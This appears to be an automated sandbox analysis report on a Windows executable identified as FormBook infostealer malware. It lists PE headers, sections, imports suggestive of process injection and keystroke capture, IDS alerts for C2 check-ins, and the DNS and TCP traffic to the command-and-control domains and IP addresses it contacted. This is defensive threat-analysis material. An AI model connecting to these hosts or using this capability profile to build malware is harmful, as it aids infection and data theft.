          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
          Icon Hash:aaf3e3e3938382a0
          Entrypoint:0x420577
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
          Time Stamp:0x66A03C43 [Tue Jul 23 23:26:59 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:948cc502fe9226992dce9417f952fce3
          Instruction
          call 00007FCFA856BEF3h
          jmp 00007FCFA856B7FFh
          push ebp
          mov ebp, esp
          push esi
          push dword ptr [ebp+08h]
          mov esi, ecx
          call 00007FCFA856B9DDh
          mov dword ptr [esi], 0049FDF0h
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          and dword ptr [ecx+04h], 00000000h
          mov eax, ecx
          and dword ptr [ecx+08h], 00000000h
          mov dword ptr [ecx+04h], 0049FDF8h
          mov dword ptr [ecx], 0049FDF0h
          ret
          push ebp
          mov ebp, esp
          push esi
          push dword ptr [ebp+08h]
          mov esi, ecx
          call 00007FCFA856B9AAh
          mov dword ptr [esi], 0049FE0Ch
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          and dword ptr [ecx+04h], 00000000h
          mov eax, ecx
          and dword ptr [ecx+08h], 00000000h
          mov dword ptr [ecx+04h], 0049FE14h
          mov dword ptr [ecx], 0049FE0Ch
          ret
          push ebp
          mov ebp, esp
          push esi
          mov esi, ecx
          lea eax, dword ptr [esi+04h]
          mov dword ptr [esi], 0049FDD0h
          and dword ptr [eax], 00000000h
          and dword ptr [eax+04h], 00000000h
          push eax
          mov eax, dword ptr [ebp+08h]
          add eax, 04h
          push eax
          call 00007FCFA856E59Dh
          pop ecx
          pop ecx
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          lea eax, dword ptr [ecx+04h]
          mov dword ptr [ecx], 0049FDD0h
          push eax
          call 00007FCFA856E5E8h
          pop ecx
          ret
          push ebp
          mov ebp, esp
          push esi
          mov esi, ecx
          lea eax, dword ptr [esi+04h]
          mov dword ptr [esi], 0049FDD0h
          push eax
          call 00007FCFA856E5D1h
          test byte ptr [ebp+08h], 00000001h
          pop ecx
          Programming Language:
          • [ C ] VS2008 SP1 build 30729
          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x3a600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10f000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x3a600 | 0x3a600 | a7d85690ed52c69bac464be37812a85c | False | 0.8882285532655246 | data | 7.796236412260973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10f000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x318c6 | data | | | 1.000349839862035
RT_GROUP_ICON | 0x10e080 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x10e0f8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10e10c | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x10e120 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x10e134 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x10e210 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
          DLL | Import
          WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
          VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
          WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
          COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
          MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
          WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
          PSAPI.DLL | GetProcessMemoryInfo
          IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
          USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
          UxTheme.dll | IsThemeActive
          KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
          USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
          GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
          COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
          ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
          SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
          ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
          OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
          Language of compilation system | Country where language is spoken
          English | Great Britain
          Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
          2024-08-07T12:47:40.875845+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49736 | 80 | 192.168.2.4 | 65.21.196.90
          2024-08-07T12:49:42.895880+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49740 | 80 | 192.168.2.4 | 213.186.33.5
          2024-08-07T12:51:05.923753+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49741 | 80 | 192.168.2.4 | 104.18.24.121
          2024-08-07T12:46:56.400874+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49739 | 80 | 192.168.2.4 | 185.199.108.153
          2024-08-07T12:48:01.173402+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49738 | 80 | 192.168.2.4 | 66.235.200.145
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Aug 7, 2024 12:47:40.370599985 CEST | 49736 | 80 | 192.168.2.4 | 65.21.196.90
          Aug 7, 2024 12:47:40.376116991 CEST | 80 | 49736 | 65.21.196.90 | 192.168.2.4
          Aug 7, 2024 12:47:40.376344919 CEST | 49736 | 80 | 192.168.2.4 | 65.21.196.90
          Aug 7, 2024 12:47:40.376432896 CEST | 49736 | 80 | 192.168.2.4 | 65.21.196.90
          Aug 7, 2024 12:47:40.382095098 CEST | 80 | 49736 | 65.21.196.90 | 192.168.2.4
          Aug 7, 2024 12:47:40.869812012 CEST | 49736 | 80 | 192.168.2.4 | 65.21.196.90
          Aug 7, 2024 12:47:40.875582933 CEST | 80 | 49736 | 65.21.196.90 | 192.168.2.4
          Aug 7, 2024 12:47:40.875844955 CEST | 49736 | 80 | 192.168.2.4 | 65.21.196.90
          Aug 7, 2024 12:48:00.668325901 CEST | 49738 | 80 | 192.168.2.4 | 66.235.200.145
          Aug 7, 2024 12:48:00.673918009 CEST | 80 | 49738 | 66.235.200.145 | 192.168.2.4
          Aug 7, 2024 12:48:00.674156904 CEST | 49738 | 80 | 192.168.2.4 | 66.235.200.145
          Aug 7, 2024 12:48:00.674156904 CEST | 49738 | 80 | 192.168.2.4 | 66.235.200.145
          Aug 7, 2024 12:48:00.684935093 CEST | 80 | 49738 | 66.235.200.145 | 192.168.2.4
          Aug 7, 2024 12:48:01.166892052 CEST | 49738 | 80 | 192.168.2.4 | 66.235.200.145
          Aug 7, 2024 12:48:01.172947884 CEST | 80 | 49738 | 66.235.200.145 | 192.168.2.4
          Aug 7, 2024 12:48:01.173402071 CEST | 49738 | 80 | 192.168.2.4 | 66.235.200.145
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Aug 7, 2024 12:47:40.293159962 CEST | 57074 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:47:40.369519949 CEST | 53 | 57074 | 1.1.1.1 | 192.168.2.4
          Aug 7, 2024 12:48:00.636111975 CEST | 64191 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:48:00.667459965 CEST | 53 | 64191 | 1.1.1.1 | 192.168.2.4
          Aug 7, 2024 12:48:20.746228933 CEST | 56432 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:48:20.756443977 CEST | 53 | 56432 | 1.1.1.1 | 192.168.2.4
          Aug 7, 2024 12:49:01.578761101 CEST | 54958 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:49:01.744726896 CEST | 53 | 54958 | 1.1.1.1 | 192.168.2.4
          Aug 7, 2024 12:49:21.948733091 CEST | 54529 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:49:22.117286921 CEST | 53 | 54529 | 1.1.1.1 | 192.168.2.4
          Aug 7, 2024 12:49:42.339297056 CEST | 52466 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:49:42.380734921 CEST | 53 | 52466 | 1.1.1.1 | 192.168.2.4
          Aug 7, 2024 12:50:02.921076059 CEST | 56757 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:50:02.943342924 CEST | 53 | 56757 | 1.1.1.1 | 192.168.2.4
          Aug 7, 2024 12:50:23.371768951 CEST | 58533 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:50:23.623850107 CEST | 53 | 58533 | 1.1.1.1 | 192.168.2.4
          Aug 7, 2024 12:50:43.762511015 CEST | 50948 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:50:44.016607046 CEST | 53 | 50948 | 1.1.1.1 | 192.168.2.4
          Aug 7, 2024 12:51:04.724073887 CEST | 49601 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:51:05.414748907 CEST | 53 | 49601 | 1.1.1.1 | 192.168.2.4
          Aug 7, 2024 12:51:25.433774948 CEST | 63198 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 7, 2024 12:51:25.758047104 CEST | 53 | 63198 | 1.1.1.1 | 192.168.2.4
          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          Aug 7, 2024 12:47:40.293159962 CEST | 192.168.2.4 | 1.1.1.1 | 0x19ac | Standard query (0) | www.00050591.xyz | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:48:00.636111975 CEST | 192.168.2.4 | 1.1.1.1 | 0x233c | Standard query (0) | www.californiacurrentelectric.com | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:48:20.746228933 CEST | 192.168.2.4 | 1.1.1.1 | 0x950e | Standard query (0) | www.b2vvuc00.sbs | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:49:01.578761101 CEST | 192.168.2.4 | 1.1.1.1 | 0xc4f1 | Standard query (0) | www.susansellsmarin.com | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:49:21.948733091 CEST | 192.168.2.4 | 1.1.1.1 | 0x7bd4 | Standard query (0) | www.urbanholidayz.com | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:49:42.339297056 CEST | 192.168.2.4 | 1.1.1.1 | 0x6123 | Standard query (0) | www.batremake.com | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:50:02.921076059 CEST | 192.168.2.4 | 1.1.1.1 | 0xbc4f | Standard query (0) | www.crucka.xyz | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:50:23.371768951 CEST | 192.168.2.4 | 1.1.1.1 | 0x23b8 | Standard query (0) | www.tech-with-thulitha.site | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:50:43.762511015 CEST | 192.168.2.4 | 1.1.1.1 | 0x3981 | Standard query (0) | www.fostertv.net | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:51:04.724073887 CEST | 192.168.2.4 | 1.1.1.1 | 0x3a15 | Standard query (0) | www.p-afactorysale.shop | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:51:25.433774948 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ea0 | Standard query (0) | www.arthemis-168bet.site | A (IP address) | IN (0x0001) | false
          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          Aug 7, 2024 12:47:40.369519949 CEST | 1.1.1.1 | 192.168.2.4 | 0x19ac | No error (0) | www.00050591.xyz | 00050591.xyz | | CNAME (Canonical name) | IN (0x0001) | false
          Aug 7, 2024 12:47:40.369519949 CEST | 1.1.1.1 | 192.168.2.4 | 0x19ac | No error (0) | 00050591.xyz | | 65.21.196.90 | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:48:00.667459965 CEST | 1.1.1.1 | 192.168.2.4 | 0x233c | No error (0) | www.californiacurrentelectric.com | californiacurrentelectric.com | | CNAME (Canonical name) | IN (0x0001) | false
          Aug 7, 2024 12:48:00.667459965 CEST | 1.1.1.1 | 192.168.2.4 | 0x233c | No error (0) | californiacurrentelectric.com | | 66.235.200.145 | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:48:20.756443977 CEST | 1.1.1.1 | 192.168.2.4 | 0x950e | Name error (3) | www.b2vvuc00.sbs | none | none | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:49:01.744726896 CEST | 1.1.1.1 | 192.168.2.4 | 0xc4f1 | Name error (3) | www.susansellsmarin.com | none | none | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:49:22.117286921 CEST | 1.1.1.1 | 192.168.2.4 | 0x7bd4 | No error (0) | www.urbanholidayz.com | kevintomc.github.io | | CNAME (Canonical name) | IN (0x0001) | false
          Aug 7, 2024 12:49:22.117286921 CEST | 1.1.1.1 | 192.168.2.4 | 0x7bd4 | No error (0) | kevintomc.github.io | | 185.199.108.153 | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:49:22.117286921 CEST | 1.1.1.1 | 192.168.2.4 | 0x7bd4 | No error (0) | kevintomc.github.io | | 185.199.109.153 | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:49:22.117286921 CEST | 1.1.1.1 | 192.168.2.4 | 0x7bd4 | No error (0) | kevintomc.github.io | | 185.199.110.153 | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:49:22.117286921 CEST | 1.1.1.1 | 192.168.2.4 | 0x7bd4 | No error (0) | kevintomc.github.io | | 185.199.111.153 | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:49:42.380734921 CEST | 1.1.1.1 | 192.168.2.4 | 0x6123 | No error (0) | www.batremake.com | | 213.186.33.5 | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:50:02.943342924 CEST | 1.1.1.1 | 192.168.2.4 | 0xbc4f | Name error (3) | www.crucka.xyz | none | none | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:50:23.623850107 CEST | 1.1.1.1 | 192.168.2.4 | 0x23b8 | Server failure (2) | www.tech-with-thulitha.site | none | none | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:50:44.016607046 CEST | 1.1.1.1 | 192.168.2.4 | 0x3981 | Name error (3) | www.fostertv.net | none | none | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:51:05.414748907 CEST | 1.1.1.1 | 192.168.2.4 | 0x3a15 | No error (0) | www.p-afactorysale.shop | | 104.18.24.121 | A (IP address) | IN (0x0001) | false
          Aug 7, 2024 12:51:25.758047104 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ea0 | No error (0) | www.arthemis-168bet.site | arthemis-168bet.site | | CNAME (Canonical name) | IN (0x0001) | false
          Aug 7, 2024 12:51:25.758047104 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ea0 | No error (0) | arthemis-168bet.site | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
          • www.00050591.xyz
          • www.californiacurrentelectric.com
          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          0 | 192.168.2.4 | 49736 | 65.21.196.90 | 80 | 2580 | C:\Windows\explorer.exe
          Timestamp | Bytes transferred | Direction | Data
